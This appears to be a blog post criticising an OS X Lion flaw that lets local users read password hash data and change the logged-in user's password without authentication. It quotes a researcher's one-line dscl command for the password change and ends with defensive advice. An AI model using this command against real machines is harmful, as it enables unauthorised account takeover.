Serious Flaw In OS X Allows ANY Local User To Change Your Password…. Fanbois Freak

I used to think that Apple OS X was an extremely secure operating system. However this news has me thinking twice. If you’re running OS X Lion, a security researcher has discovered that any user can change the password of any other user:

In previous versions of OS X (10.6, 10.5, 10.4) the process to extract user password hashes has been the same: obtain the user’s GeneratedUID and then use that ID to extract hashes from a specific user’s shadow file (See my previous post for a more detailed description).

When it comes to Lion, the general premise is the same (albeit a few technical differences). Each user has their own shadow file, with each shadow file stored under a .plist file located in /var/db/dslocal/nodes/Default/users/.

The interesting thing when it comes to Lion’s implementation, however, is privilege. As mentioned above, all OS X versions are using shadow files. For the unfamiliar, a shadow file is that which can only be accessed by users with a high privilege (typically root). So for all modern OS X platforms (Tiger, Leopord, Snow Leapord and Lion) each user has their own shadow file (hash database) whose data is accessible only by the root user… or at least it should be.

It appears in the redesign of OS X Lion’s authentication scheme a critical step has been overlooked. Whilst non-root users are unable to access the shadow files directly, Lion actually provides non-root users the ability to still view password hash data. This is accomplished by extracting the data straight from Directory Services.

Ouch. This is one hell of a screw up. But it’s actually worse than that. Most operating systems require you to type in the existing password before you can change it. Not OS X Lion:

Now, if the password is not found by the dictionary file you’re out of luck, right? Well, no! Why crack hashes when you can just change the password directly! It appears Directory Services in Lion no longer requires authentication when requesting a password change for the current user. So, in order to change the password of the currently logged in user, simply use:

$ dscl localhost -passwd /Search/Users/bob

And voilà! You will be prompted to enter a new password without the need to authenticate.

Apple has really dropped the ball here. But there is some good news. A hacker needs to have direct access to the computer. So nobody from the other side of the planet could hack your Mac. Also, there are no known exploits in the wild (yet). Still this is a #fail for Apple.

How do you protect yourself if you’re an OS X Lion user? Cnet recommends that you disabling automatic log-in, enabling sleep and screensaver passwords and disabling guest accounts. Or you could always go back to Leopard or Snow Leopard.

Apple, you have some explaining to do.

Leave a Reply

%d bloggers like this: